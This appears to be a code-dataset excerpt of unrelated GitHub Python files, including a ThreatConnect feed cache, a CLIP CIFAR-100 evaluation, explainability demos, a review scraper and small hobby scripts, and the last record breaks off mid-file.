self._location\n\n\nclass FeedStreamBase(object):\n \"\"\"A Feed Stream is used to save a feed bit by bit instead of all at once.\"\"\"\n\n def __init__(self):\n self._complete = False\n self._report_count = 0\n self._ioc_count = 0\n\n def __enter__(self):\n self.open()\n return self\n\n def open(self):\n raise NotImplementedError()\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.close()\n\n def close(self):\n raise NotImplementedError()\n\n @property\n def complete(self):\n \"\"\"\n Determines if feed storage has completed. If this is not set to true by the time close() or __exit() is called,\n it is assumed the writing of the feed was not completed and therefore is scrapped.\n \"\"\"\n return self._complete\n\n @complete.setter\n def complete(self, value):\n self._complete = value\n\n @property\n def report_count(self):\n return self._report_count\n\n @property\n def ioc_count(self):\n return self._ioc_count\n\n def write(self, report):\n raise NotImplementedError()\n\n\nclass FeedStream(FeedCacheBase, FeedStreamBase):\n \"\"\"Allows reports to be written in a streamed way instead of all at once to save memory.\"\"\"\n\n _feed_header_template = Template(textwrap.dedent(\"\"\"\n ],\n \"feedinfo\": {\n \"category\": \"Partner\",\n \"provider_url\": \"http://www.threatconnect.com/\",\n \"display_name\": \"{{display_name}}\",\n \"name\": \"threatconnectintegration\",\n \"tech_data\": \"There are no requirements to share any data to receive this feed.\",\n \"summary\": \"Threat intelligence data provided by ThreatConnect to the VMware Carbon Black Community\",\n \"icon_small\": \"{{icon_small}}\",\n \"icon\": \"{{icon}}\",\n \"num_reports\": {{num_reports}}\n }\n }\"\"\"))\n\n def __init__(self, config, location, lock):\n FeedCacheBase.__init__(self, config, location, lock)\n FeedStreamBase.__init__(self)\n self._file = None\n\n def open(self):\n if self._file:\n raise IOError(\"Stream is already open. 
Cannot open a new stream until this one is closed.\")\n\n self._report_count = 0\n self._ioc_count = 0\n self._complete = False\n\n self._ensure_location_exists()\n self._file = open(os.path.join(self._location, self._feed_cache_new_file), \"w\")\n # We have to write the reports first and then the feed info because the number of reports is not yet known.\n self._file.write(textwrap.dedent(\"\"\"\n {\n \"reports\":\n [\"\"\"))\n\n def close(self):\n if not self._file:\n raise IOError(\"Stream must be opened before it can be closed.\")\n try:\n self._file.write(self._feed_header_template.render(\n display_name=self._config.display_name,\n icon_small=cbint.utils.feed.generate_icon(\n \"{}/{}\".format(self._config.directory, self._config.integration_image_small_path)),\n icon=cbint.utils.feed.generate_icon(\n \"{}/{}\".format(self._config.directory, self._config.integration_image_path)),\n num_reports=self._report_count\n ))\n finally:\n self._file.close()\n self._file = None\n if self._complete:\n self._swap_file_cache()\n\n def write(self, report):\n if not self._file:\n raise IOError(\"Stream must be opened before it can be written to.\")\n report_text = json.dumps(report, indent=2 if self._config.pretty_print_json else None)\n self._file.write(\"{}\\n{}\".format(\",\" if self._report_count else \"\", report_text))\n\n self._report_count += 1\n for ioc_list in report[\"iocs\"].values():\n self._ioc_count += len(ioc_list)\n\n\nclass FeedCache(FeedCacheBase):\n \"\"\"Manages the feed data that is cached on disk.\n\n Going forward, instead of keeping a feed in memory, it is now stored on disk. This is to reduce memory\n footprint of long running process.\n \"\"\"\n\n def __init__(self, config, location, lock):\n super(FeedCache, self).__init__(config, location, lock)\n\n def verify(self):\n \"\"\"Checks to see if the feed cache exists on disk.\n Once it is determined to exist, it is never checked again.\n \"\"\"\n if self._exists:\n return True\n self._ensure_location_exists()\n with self._lock:\n if not os.path.isfile(os.path.join(self._location, \"feed.cache\")):\n if os.path.isfile(os.path.join(self._location, \"reports.cache\")):\n _logger.warning(\"Feed cache file missing. Reading report cache to create feed.\")\n try:\n with open(os.path.join(self._location, \"reports.cache\"), \"r\") as f:\n reports = json.loads(f.read())\n if self.write_reports(reports):\n self._exists = True\n except (IOError, OSError) as e:\n _logger.warning(\"Could not read from reports cache: {0}\".format(e))\n else:\n _logger.warning(\"Feed cache and report cache missing. 
Instance appears new.\")\n else:\n self._exists = True\n gc.collect()\n return self._exists\n\n @property\n def exists(self):\n return self.verify()\n\n def generate_feed(self, reports=None):\n \"\"\"\n Generate a feed definition.\n :param reports: list of report definitions\n :return: defined feed\n \"\"\"\n reports = reports or []\n feed = cbint.utils.feed.generate_feed(\n self._config.feed_name,\n summary=\"Threat intelligence data provided by ThreatConnect to the VMware Carbon Black Community\",\n tech_data=\"There are no requirements to share any data to receive this feed.\",\n provider_url=\"http://www.threatconnect.com/\",\n icon_path=\"{}/{}\".format(self._config.directory, self._config.integration_image_path),\n small_icon_path=\"{}/{}\".format(self._config.directory, self._config.integration_image_small_path),\n display_name=self._config.display_name,\n category=\"Partner\")\n feed['reports'] = reports\n feed['feedinfo']['num_reports'] = len(reports)\n return feed\n\n def write_reports(self, reports):\n self._ensure_location_exists()\n feed = self.generate_feed(reports)\n success = self.write_feed(feed)\n del feed\n gc.collect()\n return success\n\n def write_feed(self, feed):\n _logger.debug(\"Writing to feed cache.\")\n write_start = timer()\n try:\n self._ensure_location_exists()\n with open(os.path.join(self._location, self._feed_cache_new_file), \"w\") as f:\n if self._config.pretty_print_json:\n f.write(json.dumps(feed, indent=2))\n else:\n f.write(json.dumps(feed))\n del feed\n self._swap_file_cache()\n self._exists = True\n _logger.debug(\"Finished writing feed to cache ({0:.3f} seconds).\".format(timer() - write_start))\n\n except (IOError, OSError) as e:\n _logger.error(\"Failed to write to feed cache: {}\".format(e))\n return False\n return True\n\n def read(self, as_text=False):\n if not self.exists:\n return None\n with self._lock:\n try:\n with open(os.path.join(self._location, self._feed_cache_file), \"r\") as f:\n return f.read() if as_text else json.loads(f.read())\n except (IOError, OSError) as e:\n _logger.exception(\"Could not read from feed cache: {0}\".format(e))\n return None\n\n def create_stream(self):\n return FeedStream(self._config, self._location, self._lock)\n","repo_name":"carbonblack/cb-threatconnect-connector","sub_path":"src/cbopensource/connectors/threatconnect/feed_cache.py","file_name":"feed_cache.py","file_ext":"py","file_size_in_byte":9991,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"23478639415","text":"import os\nimport clip\nimport torch\nfrom torchvision.datasets import CIFAR100\n\nfrom PIL import Image\nimport requests\nfrom transformers import AutoProcessor, BlipModel\n\n# model = BlipModel.from_pretrained(\"Salesforce/blip-image-captioning-base\")\n# processor = AutoProcessor.from_pretrained(\"Salesforce/blip-image-captioning-base\")\n\n# import cv2\nimport os\nfrom tqdm import tqdm\nimport math\nimport numpy as np\nimport os\nimport clip\nimport torch\nimport re\nimport torch\n\n#model_b, preprocess = clip.load(params['model_size'], device='cpu')\n\nclass Dataset(torch.utils.data.Dataset):\n \n def __init__(self, images):\n self.images=images\n \n def __len__(self):\n return len(self.images)\n \n def __getitem__(self, index):\n X = self.images[index]\n return preprocess(X)\n\n\ndef compute_model_performance(model_dict: dict()):\n global preprocess\n device = 'cuda'\n cifar100 = CIFAR100(root=os.path.expanduser(\"~/.cache\"), download=True, train=False)\n params = {}\n 
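    # --- Editor's note (illustrative, not from the original file) ---\n    # Zero-shot CLIP classification: encode one text prompt per class (\"a photo of a {c}\")\n    # and score each image by similarity against every prompt. A minimal sketch of the idea,\n    # assuming 'model' and 'preprocess' come from clip.load and 'classes' is a list of labels:\n    #   image = preprocess(Image.open(\"cat.png\")).unsqueeze(0).to(device)\n    #   text = clip.tokenize([f\"a photo of a {c}\" for c in classes]).to(device)\n    #   with torch.no_grad():\n    #       img_f = model.encode_image(image).float()\n    #       txt_f = model.encode_text(text).float()\n    #   img_f /= img_f.norm(dim=-1, keepdim=True)\n    #   txt_f /= txt_f.norm(dim=-1, keepdim=True)\n    #   probs = (100.0 * img_f @ txt_f.T).softmax(dim=-1)\n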
params['model_size'] = \"ViT-B/32\"\n params['device'] = device if torch.cuda.is_available() else \"cpu\"\n model, preprocess = clip.load(params['model_size'], device=params['device'])\n model.load_state_dict(model_dict)\n model = model.to('cuda')\n model.eval()\n model.requires_grad_(False)\n print(\"CLIP model loaded\")\n params = {'batch_size': 32, 'shuffle': False, 'num_workers':4}\n testset=[]\n correctlabels=[]\n for image,class_id in cifar100:\n testset.append(image)\n correctlabels.append(class_id)\n text_inputs = torch.cat([clip.tokenize(f\"a photo of a {c}\") for c in cifar100.classes]).to(device)\n text_features = model.encode_text(text_inputs).float()\n test_set = Dataset(testset)\n results = []\n testloader = torch.utils.data.DataLoader(test_set, **params)\n for idx, item in enumerate(tqdm(testloader,desc=\"Inference\")):\n with torch.no_grad():\n item = item.to(device)\n outputs = model.encode_image(item).float()\n\n results.append(outputs)\n \n \n img_features = torch.vstack(results[0:-1]) \n img_features /= img_features.norm(dim=-1, keepdim=True)\n values,indices = (img_features.squeeze() @ text_features.T).softmax(dim=1).topk(1)\n accuracy = {}\n for idx,item in enumerate(indices):\n accuracy[idx] = 0\n if (item.item() == correctlabels[idx]):\n accuracy[idx] = 1\n top1= sum(accuracy.values())/len(accuracy)\n print(f\"Top-1 accuracy is {sum(accuracy.values())/len(accuracy)}\")\n values,indices = (img_features.squeeze() @ text_features.T).softmax(dim=1).topk(5)\n accuracy = {}\n for idx,item in enumerate(indices):\n accuracy[idx] = 0\n for curr_item in item:\n if (curr_item.item() == correctlabels[idx]):\n accuracy[idx] = 1\n top5 = sum(accuracy.values())/len(accuracy)\n print(f\"Top-5 accuracy is {sum(accuracy.values())/len(accuracy)}\")\n return {\"top-1\":top1, \"top-5\":top5}","repo_name":"sinkanishk/E6998-HPML-TermProject","sub_path":"utils/CLIP_CIFAR_100.py","file_name":"CLIP_CIFAR_100.py","file_ext":"py","file_size_in_byte":2976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73165084392","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nimport tensorflow as tf\nfrom math import ceil\nfrom time import time\nimport keras\nimport xplique\nfrom xplique.attributions import Rise\nfrom xplique.plots import plot_attributions\nimport cv2\nimport requests\n\ndef download_image(image_url, filename):\n response = requests.get(image_url, stream=True)\n if response.status_code == 200:\n with open(filename, 'wb') as file:\n for chunk in response.iter_content(1024):\n file.write(chunk)\n\n# Example Usage\ndownload_image('https://unsplash.com/photos/X2PwqTUpXH8/download?force=true&w=640', 'fox1.jpg')\ndownload_image('https://unsplash.com/photos/tIfrzHxhPYQ/download?force=true&w=640', 'fox2.jpg')\ndownload_image('https://unsplash.com/photos/LVnJlyfa7Zk/download?force=true&w=640', 'sea_turtle.jpg')\ndownload_image('https://unsplash.com/photos/sSEEbAzB6fU/download?force=true&w=640', 'lynx.jpg')\ndownload_image('https://unsplash.com/photos/41dAczoRYJY/download?force=true&w=640', 'cat.jpg')\ndownload_image('https://unsplash.com/photos/axqTLZ12Jss/download?force=true&w=640', 'otter.jpg')\n\nimg_list = [\n ('fox1.jpg', 277),\n ('fox2.jpg', 277),\n ('sea_turtle.jpg', 33),\n ('lynx.jpg', 287),\n ('cat.jpg', 281),\n ('otter.jpg', 360)\n]\n\ndef central_crop_and_resize(img, size=224):\n \"\"\"\n Given a numpy array, extracts the largest possible square and resizes it to\n the requested size\n \"\"\"\n h, w, _ = 
img.shape\n\n min_side = min(h, w)\n max_side_center = max(h, w) // 2.0\n\n min_cut = int(max_side_center-min_side//2)\n max_cut = int(max_side_center+min_side//2)\n\n img = img[:, min_cut:max_cut] if w > h else img[min_cut:max_cut]\n img = tf.image.resize(img, (size, size))\n\n return img\n\nX = []\nY = []\n\nfor img_name, label in img_list:\n img = cv2.imread(img_name)[..., ::-1] # when cv2 load an image, the channels are inversed\n img = central_crop_and_resize(img)\n label = tf.keras.utils.to_categorical(label, 1000)\n\n X.append(img)\n Y.append(label)\n\nX = np.array(X, dtype=np.float32)\nY = np.array(Y)\n\nplt.rcParams[\"figure.figsize\"] = [15, 6]\nfor img_id, img in enumerate(X):\n plt.subplot(1, len(X), img_id+1)\n plt.imshow(img/255.0)\n plt.axis('off')\n\nimport tensorflow.keras.applications as app\n\nmodel, preprocessing = app.MobileNetV2(classifier_activation=\"linear\"), app.mobilenet_v2.preprocess_input\nX_preprocessed = preprocessing(np.array(X, copy=True))\n\nfrom xplique.attributions import (Saliency, GradientInput, IntegratedGradients, SmoothGrad, VarGrad,\n SquareGrad, GradCAM, Occlusion, Rise, GuidedBackprop,\n GradCAMPP, Lime, KernelShap, SobolAttributionMethod)\nfrom xplique.commons import forgrad\n\nbatch_size = 64\nexplainers = [\n Saliency(model),\n GradientInput(model),\n GuidedBackprop(model),\n IntegratedGradients(model, steps=80, batch_size=batch_size),\n SmoothGrad(model, nb_samples=80, batch_size=batch_size),\n SquareGrad(model, nb_samples=80, batch_size=batch_size),\n VarGrad(model, nb_samples=80, batch_size=batch_size),\n Occlusion(model, patch_size=10, patch_stride=5, batch_size=batch_size),\n]\n\nfor explainer in explainers:\n\n explanations = explainer(X_preprocessed, Y)\n\n print(f\"Method: {explainer.__class__.__name__}\")\n plot_attributions(explanations, X, img_size=2., cmap='jet', alpha=0.4,\n cols=len(X), absolute_value=True, clip_percentile=0.5)\n plt.show()\n\n filtered_explanations = forgrad(explanations, sigma=15)\n print('With ForGRAD')\n plot_attributions(filtered_explanations, X, img_size=2., cmap='jet', alpha=0.4,\n cols=len(X), absolute_value=True, clip_percentile=0.5)\n plt.show()\n\n print(\"\\n\")\n\nfrom xplique.plots import plot_attribution\n\ndef show(img, **kwargs):\n img = np.array(img)\n img -= img.min(); img / img.max()\n plt.imshow(img, **kwargs)\n\n\nexplainer = SmoothGrad(model)\nexplanations = explainer(X_preprocessed, Y)\n\nfiltered_explanations = []\n\nsigmas=[224, 200, 125, 100, 50, 30, 20, 15, 7, 4]\n\nfor sigma in sigmas:\n filtered_explanation = forgrad(explanations, sigma=sigma)\n filtered_explanations.append(filtered_explanation)\n\nfor x_i, x in enumerate(X):\n for sigma_i, sigma in enumerate(sigmas):\n\n plt.subplot(1, len(sigmas), sigma_i+1)\n plot_attribution(filtered_explanations[sigma_i][x_i], X[x_i], cmap='jet', alpha=0.4,\n absolute_value=True, clip_percentile=0.5)\n plt.title(f'sigma={sigma}')\n\n plt.show()\n\nprint(\"\\n\")","repo_name":"Medhasweta/Deep_Learning_Team_2","sub_path":"CODE/Medhasweta Sen/XAI/ForGrad.py","file_name":"ForGrad.py","file_ext":"py","file_size_in_byte":4564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32433791808","text":"import sqlalchemy as sa\nimport sqlalchemy.orm as orm\n\nfrom dbk.core import models\nfrom dbk.errors import DbkError\n\n\nclass InitializationFailed(DbkError):\n pass\n\n\ndef initialize(session: orm.sessionmaker[orm.Session]):\n \"\"\"\n Ensures there is at least one book in the database. 
If there is not, a book is\n created with the name \"My Book\" and the currency \"USD\". Four root accounts are\n added to the book: \"Assets\", \"Liabilities\", \"Incomes\", and \"Expenses\".\n\n :raises InitializationFailed: if this method fails in any way\n \"\"\"\n try:\n with session() as s, s.begin():\n if has_any_books(s):\n return\n add_default_book(s)\n except Exception as e:\n raise InitializationFailed(\"Failed to initialize database\") from e\n\n\ndef has_any_books(session: orm.Session) -> bool:\n return session.execute(sa.select(sa.func.count(models.Book.id))).scalar_one() > 0\n\n\ndef add_default_book(session: orm.Session) -> models.Book:\n book = models.Book(name=\"My Book\", currency=\"USD\")\n session.add(book)\n\n root_accounts = [\n (\"Assets\", models.AccountType.asset),\n (\"Liabilities\", models.AccountType.liability),\n (\"Incomes\", models.AccountType.income),\n (\"Expenses\", models.AccountType.expense),\n ]\n\n for name, account_type in root_accounts:\n book.accounts.append(\n models.Account(\n name=name,\n account_type=account_type,\n is_root=True,\n is_virtual=True,\n )\n )\n\n return book\n","repo_name":"EvanAranda/dbk","sub_path":"dbk/core/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19323054701","text":"import erp_extraction.menu.phase_00_functions as p0\nimport erp_extraction.menu.phase_01_functions as p1\n\n\nclass Menu:\n menu_id = \"start\"\n last_user_input = None\n __phases = [\n {\n \"id\": \"start\",\n \"options\": {\n \"Attendance Summary\": p1.attendance_summary,\n \"Day to Day Attendance Table\": p1.day_day_attendance,\n \"Grades\": p1.grades,\n \"Exit\": p0.exitmenu,\n },\n }\n ]\n\n def __init__(self) -> None:\n pass\n\n def get_options(self):\n for phase in self.__phases:\n if phase[\"id\"] == self.get_current_menu_id():\n return phase[\"options\"]\n\n def add_phase(self, id, options):\n self.__phases.append({\"id\": id, \"options\": options})\n\n def display_menu(self):\n while True:\n print(\"\\n\")\n cur_id = self.get_current_menu_id()\n if cur_id == \"end\":\n break\n\n options = self.get_options()\n\n for (index, option) in enumerate(options.keys()):\n print(f\"{index + 1}. 
{option}\")\n\n print()\n user_input = int(input(\"Option: \")) - 1\n self.last_user_input = user_input\n print()\n for (index, cb) in enumerate(options.values()):\n # From python 3.6+ disctionaries are ordered\n if index == user_input:\n cb(self)\n\n def get_current_menu_id(self):\n return self.menu_id\n\n def set_current_menu_id(self, new_id):\n self.menu_id = new_id\n","repo_name":"tmayush/erp_extraction","sub_path":"erp_extraction/menu/menu_display.py","file_name":"menu_display.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16584661502","text":"from scipy.fftpack import fft\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom pylab import*\nfrom scipy.io import wavfile\nimport math\n\nclass Rhythmus():\n staticmethod\n\n bpm = 0\n s1 = []\n end = {}\n \n def graph(name):\n #name = 'All.wav'\n sampFreq, snd = wavfile.read(name)\n\n snd = snd / (2.**15)\n #print(\"snd.shape: \"+ str(snd.shape))\n\n points = snd.shape[0]\n #print(points)\n\n if len(snd.shape) == 1:\n s1 = snd[:]\n else:\n s1 = snd[:, 0]\n #print(snd.shape[0])\n return s1\n\n def bpm(s1):\n s3 = s1\n\n for i in range(len(s3)):\n if s3[i] < 0:\n s3[i] = 0\n\n sorted_s1 = sort(s3)\n\n for i in range(len(s1)):\n if s3[i] < sorted_s1[len(s1) - len(s1)/10 ]:\n s3[i] = 0\n else:\n s3[i] = 1\n\n #plt.plot(s3, color='k')\n #plt.show()\n\n ###### ##### ##### ### ## #### ###\n ###### ##### ##### ### ## #### ###\n ###### ##### ##### ### ## #### ###\n ###### ##### ##### ### ## #### ###\n ###### ##### ##### ### ## #### ###\n ###### ##### ##### ### ## #### ###\n ###### ##### ##### ### ## #### ###\n ###### ##### ##### ### ## #### ###\n ###### ##### ##### ### ## #### ###\n ###### ##### ##### ### ## #### ###\n ###### ##### ##### ### ## #### ###\n ###### ##### ##### ### ## #### ###\n ###### ##### ##### ### ## #### ###\n ###### ##### ##### ### ## #### ###\n\n white_size = 0\n white_erro = 0\n white_space = []\n\n black_space_inicio = []\n black_space_final = []\n\n n = 5000\n \n for i in range(len(s3)):\n if s3[i] == 1:\n if white_erro > n:\n black_space_inicio.append(i)\n #black_space_final.append(i-black_space_inicio[])\n if white_size > 0:\n white_space.append(white_size)\n white_size = 0\n white_erro = 0\n \n if s3[i] == 0:\n # if len(spaces) > 0:\n if white_erro == n:\n black_space_final.append(i-n)\n if white_erro > n:\n \n white_erro = white_erro + 1\n white_size = white_erro\n else:\n white_erro = white_erro + 1\n # else:\n # pass\n\n plt.plot(s3, color='k')\n plt.show()\n \n black_space = []\n\n for i in range(len(white_space)+1):\n if i == 0:\n black_space.append(black_space_final[0])\n else:\n black_space.append(black_space_final[i] - black_space_inicio[i-1])\n \n if white_size > 0:\n white_space.append(white_size)\n white_size = 0\n white_erro = 0\n\n janelas = []\n for i in range(len(white_space)):\n janelas.append(white_space[i] + black_space[i-1])\n\n minimo = 1000000000\n\n for i in range(len(white_space)):\n if (white_space[i] + black_space[i]) < minimo:\n minimo = white_space[i] + black_space[i]\n\n tempos = []\n for i in range(len(white_space)):\n tempos.append( round((white_space[i] + black_space[i])/minimo) )\n\n \n end = {}\n end['janelas'] = janelas\n end['tempo'] = minimo\n end['tempos'] = tempos\n end['s1'] = s1\n\n return end\n\n def go(name):\n s1 = Rhythmus.graph(name)\n end = Rhythmus.bpm(s1)\n return end\n","repo_name":"GBortoto/Unknown","sub_path":"Rhythmus - v0.1.py","file_name":"Rhythmus - 
v0.1.py","file_ext":"py","file_size_in_byte":3958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33363767935","text":"a=input('borne basse')\nb=input('borne haute')\na=int(a)\nb=int(b)\n \naddition=0\ni=a\n\nwhile i<=b:\n if (not i%3) or (not i%5):\n addition=addition+i\n i+=1\nprint(addition)\n \n \n \n \n \n","repo_name":"yayaya123/Python","sub_path":"Ex608.py","file_name":"Ex608.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72354774633","text":"import cx_Oracle\nfrom databasecon import *\nfrom StockReader import *\n\n\ndef fetchByJoin():\n\n stCode=takeInputFromUser()\n record = getSectorAndStockInfo(stCode)\n\n sectorName = record[0]\n subSectorName = record[1]\n subSubSectorName=record[2]\n stockName = record[3]\n\n\n\n print(\"Stock Code:{},Stock Name:{},Subsector Name:{},Sector Name:{},Subsubsector Name:{}\".format(stCode, stockName, subSectorName,\n sectorName,subSubSectorName))\n return stockName,subSectorName,sectorName,stCode\n\ndef takeInputFromUser():\n r = input(\"Enter Stock Code:\").upper()\n return r\n\n","repo_name":"manasnayak/StockPortfolio","sub_path":"FetchByJoin.py","file_name":"FetchByJoin.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2988710270","text":"class Solution:\n \"\"\"\n 在每加入一个新的单词之前,都先判断下 words[i] 是不是 words[i-1] 的前缀\n \"\"\"\n def minimumLengthEncoding(self, words: list) -> int:\n s = set(words)\n for word in words:\n for i in range(1, len(word)):\n s.discard(word[i:])\n res = 0\n for em in s:\n res += len(em) + 1\n return res\n","repo_name":"Transi-ent/LeetcodeSolver","sub_path":"820.py","file_name":"820.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"28751375575","text":"import json, os\nfrom dotenv import load_dotenv\nfrom flask import Flask, request, jsonify\nfrom flask_cors import CORS\nfrom db.model import Paragraph\nfrom db import (\n get_paragraphs_by_noteids,\n delete_paragraphs_by_id,\n update_paragraphs,\n vector_similarity_search,\n vector_distance_search,\n search_paragraph_contents,\n get_paragraph_neighbors,\n get_paragraph_by_paraid,\n delete_note_paragraphs\n)\n\n\nfrom lm import (\n encode_text,\n summarize_documents\n)\n\nload_dotenv()\napp = Flask(__name__)\nCORS(app)\n\n@app.route(\"/\")\ndef hello_world():\n return \"<p>Hello, World!</p>\"\n\n# Used for writing new paragraphs, and update or deleting existing paragraphs\n@app.post('/edit_paragraphs')\ndef edit_paragraphs():\n body = request.json\n \n if 'delete' in body and body['delete']:\n #delete logic\n delete_paragraphs_by_id(body['delete'])\n \n if 'update' in body and body['update']:\n #update logic\n paragraphs_to_update = []\n for element in body['update'].values():\n paragraphs_to_update.append(\n Paragraph (\n id = element['id'],\n note_id = element['note_id'] if 'note_id' in element else '-1',\n next = element['next'] if 'next' in element else None,\n previous = element['previous'] if 'previous' in element else None,\n embedding = encode_text(element['contents']),\n contents = element['contents']\n )\n )\n \n if paragraphs_to_update:\n update_paragraphs(paragraphs_to_update)\n \n return ''\n\n@app.get(\"/get_paragraphs/<note_id>\")\ndef get_paragraphs(note_id):\n paragraphs = 
get_paragraphs_by_noteids([note_id])\n return jsonify(paragraphs)\n\n@app.delete(\"/<note_id>\")\ndef delete_note(note_id):\n delete_note_paragraphs(note_id=note_id)\n return f'Deleted paragraphs for note {note_id}!'\n\n@app.post('/get_paragraphs')\ndef get_paragraphs_with_list():\n body = request.json\n \n if 'note_ids' not in body:\n return 'No note_ids parameter specified', 400\n \n rs = get_paragraphs_by_noteids(body['note_ids'])\n \n return jsonify(rs)\n\n@app.post('/get_knn_links')\ndef get_knn_links():\n body = request.json\n \n if 'para_id' not in body:\n return 'no para_id specified', 400\n \n if 'note_ids' not in body:\n return 'No note_ids parameter specified', 400\n \n \n k = 3 if 'k' not in body else body['k']\n paragraph = get_paragraph_by_paraid(body['para_id'])\n rs = get_paragraph_neighbors(paragraph, body['note_ids'], k)\n\n result = {\n \"links\" : rs if rs else []\n }\n \n if 'include_summary' in body and body['include_summary']:\n contents = paragraph['contents']\n if len(contents) > 250:\n summary = summarize_documents(contents)\n else:\n summary = contents\n result['summary'] = summary\n \n \n return jsonify(result)\n\n\n\n\n\n# Used for writing new paragraphs, and update or deleting existing paragraphs\n@app.post('/get_similarity_links')\ndef get_similarity_links():\n body = request.json\n \n if 'para_id' not in body:\n return \"theres no para_id\", 400\n \n paragraph = get_paragraph_by_paraid(body['para_id'])\n threshold = 0.5 if 'threshold' not in body else float(body['threshold'])\n rs = vector_similarity_search(paragraph['embedding'],threshold, [paragraph[\"note_id\"]])\n \n combined_contents = \"\\n\".join([result['contents'] for result in rs])\n \n result = {\n \"paragraphs\": rs\n }\n \n if 'include_summary' in body and body['include_summary']:\n print(\"test summarization 1\")\n if len(combined_contents) > 250:\n print(\"test summarization 2\")\n summary = summarize_documents(combined_contents)\n else:\n summary = None\n result['summary'] = summary\n return jsonify(result)\n \n@app.post('/keyword_search')\ndef keyword_search():\n body = request.json\n if 'query' not in body:\n return \"theres no query\", 400\n \n rs = search_paragraph_contents(body['query'])\n \n return jsonify(rs)\n","repo_name":"mnnaegel/NoteNexus","sub_path":"notenexus-lm-api/src/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":4206,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"69798253033","text":"import scrapy\nfrom scrapy.crawler import CrawlerProcess\n\n# Trip Advisor Spider class\nclass TASpider(scrapy.Spider):\n\n # variable name\n name = \"taspider\"\n\n # start_requests method: to define which websites to scrape\n def start_requests(self):\n\n # list of webpages to scrape\n # Note: Just added three more pages which are different reviews page numbers of the same restaurant\n # so that we don't miss anything\n \n urls = [ \"https://www.tripadvisor.in/Restaurant_Review-g304551-d13388460-Reviews-Kitchen_With_A_Cause-New_Delhi_National_Capital_Territory_of_Delhi.html\",\n \"https://www.tripadvisor.in/Restaurant_Review-g304551-d13388460-Reviews-or130-Kitchen_With_A_Cause-New_Delhi_National_Capital_Territory_of_Delhi.html\",\n \"https://www.tripadvisor.in/Restaurant_Review-g304551-d13388460-Reviews-or80-Kitchen_With_A_Cause-New_Delhi_National_Capital_Territory_of_Delhi.html\",\n 
\"https://www.tripadvisor.in/Restaurant_Review-g304551-d13388460-Reviews-or180-Kitchen_With_A_Cause-New_Delhi_National_Capital_Territory_of_Delhi.html\" ]\n # follow the links to the next parser\n for url in urls:\n yield scrapy.Request(url=url, callback=self.parse_front)\n\n # parse_front method: to parse the front page\n def parse_front(self, response):\n\n # narrow down on the page block elements\n page_blocks = response.css('div.pageNumbers')\n # direct to the page links\n page_links = page_blocks.xpath('./a/@href')\n # extract the links\n links_to_follow = page_links.extract()\n print(\"\\nNumber of pages\\n\")\n print(len(links_to_follow))\n # follow the links to the next parser\n for link in links_to_follow:\n yield response.follow(url=link, callback=self.parse_second)\n \n def parse_second(self, response):\n #narrow down to eaach review\n review_blocks=response.css('div.quote')\n review_links=review_blocks.xpath('./a/@href')\n review_links=review_links.extract()\n\n for link in review_links:\n yield response.follow(url=link, callback=self.parse_pages)\n\n # parse_pages method: to parse the pages\n def parse_pages(self, response):\n\n # direct to the review title text\n review_title = response.css( 'span.noQuotes::text')\n # extract and clean the review title text\n review_title = review_title.extract_first()\n #review date\n review_date=response.css('span.ratingDate::text').extract_first()\n # direct to review text\n review_text = response.css('p.partial_entry::text')\n # extract and clean review text\n review_text = review_text.extract_first()\n # store this in dictonary\n reviews_list.append([response.url, review_title, review_date, review_text])\n\n\n# Initialize the list\nreviews_list=[]\nimport csv\n\n#\n# Run the Spider\nprocess = CrawlerProcess()\nprocess.crawl(TASpider)\nprocess.start()\n\n# reviews_list=list(set(reviews_list))\nprint(len(reviews_list))\nprint(reviews_list[-4:])\n\nwith open('reviewsData.csv', 'w') as f:\n #configure writer to write standard csv file\n writer = csv.writer(f, delimiter=',')\n writer.writerow(['Site', 'Review_title', 'Review_date', 'Review_paragraph'])\n for item in reviews_list:\n #Write item to f\n writer.writerow([item[0], item[1], item[2], item[3]]) ","repo_name":"dipansh-girdhar/Webscraping-and-text-analysis","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"72128930154","text":"class Solution(object):\n def minMoves(self, target, maxDoubles):\n \"\"\"\n :type target: int\n :type maxDoubles: int\n :rtype: int\n \"\"\"\n c=0\n while target>1:\n while maxDoubles>0 and target%2==0:\n target//=2;c+=1;maxDoubles-=1\n if target!=1:\n if maxDoubles>0:target-=1;c+=1\n else:c+=target-1;break\n return c","repo_name":"bambamshivam/LeetCode","sub_path":"Weekly_Contest_276/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"22299873260","text":"import copy\n_list=list(open(\"wordlist2.txt\").read().splitlines())\n_list.sort(key=len, reverse=True)\n\nheight=5\nwidth=5\nmaxoverlap=1\nsymmetry=True\ngrid=[['0']*width for i in range(height)]\n\ndef cprint(grid):\n print('\\n'.join([''.join(['{:3}'.format(item) for item in row]) \n for row in grid]))\n\ndef findvalids(word,grid):\n valids=[]\n for i in 